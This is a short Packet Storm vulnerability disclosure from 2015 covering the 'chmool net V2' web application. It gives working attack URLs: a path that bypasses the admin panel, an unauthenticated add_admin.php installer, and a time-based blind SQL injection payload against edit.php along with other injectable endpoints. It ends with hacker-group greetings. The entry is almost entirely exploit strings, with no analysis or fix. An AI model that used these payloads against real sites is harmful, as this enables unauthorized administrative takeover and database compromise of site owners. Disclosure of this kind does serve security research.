Chmool Net 2 SQL Injection / Unauthenticated Administrative Access

2015-06-04T00:00:00
ID PACKETSTORM:132152
Type packetstorm
Reporter indoushka
Modified 2015-06-04T00:00:00

Description

                                        
                                            `| # Title : chmool net V2 Mullti Vulnerability  
| # Author : indoushka   
| # email : indoushka4ever@gmail.com   
| # Dork : Ahmed Ellefy (c) 2014  
| # Tested on: win8.1 Fr V.(Pro) 23:11 * 22/05/2015   
| # Bug : Mullti  
| # Download : http://www.traidnt.com  
=======================================  
  
By pass Admin panel :  
  
http://127.0.0.1/chmoolnet2/admincp/  
  
Add Admin :  
  
http://127.0.0.1/chmoolnet2/install/add_admin.php  
  
Blind SQL Injection :  
  
http://127.0.0.1/chmoolnet2/admincp/pages/edit.php?id=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/  
  
http://127.0.0.1/chmoolnet2/admincp/pages/add_elan_us.php?action=submit  
  
http://127.0.0.1/chmoolnet2/admincp/pages/add_call_us.php?action=submit  
  
  
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================  
Greetz :   
Exploit-db Team :   
(loneferret+Exploits+dookie2000ca)  
all my friend :  
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)  
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/  
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net  
---------------------------------------------------------------------------------------------------------------  
`